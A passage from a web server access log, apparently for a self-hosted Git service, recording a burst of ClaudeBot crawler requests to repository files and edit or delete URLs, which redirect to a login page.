"https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 216.73.216.188] [Length 11826] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug" [Client 216.73.216.188] [Length 9821] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[15/Feb/2026:12:08:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug" -[15/Feb/2026:12:08:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/js" -[15/Feb/2026:12:08:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug" -[15/Feb/2026:12:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug" -[15/Feb/2026:12:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile?display=source" [Client 216.73.216.188] [Length 12467] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 16639] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 15725] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 27435] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 216.73.216.188] [Length 31010] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py?display=source" [Client 216.73.216.188] [Length 12346] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 216.73.216.188] [Length 11482] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 216.73.216.188] [Length 10829] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 216.73.216.188] [Length 11666] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 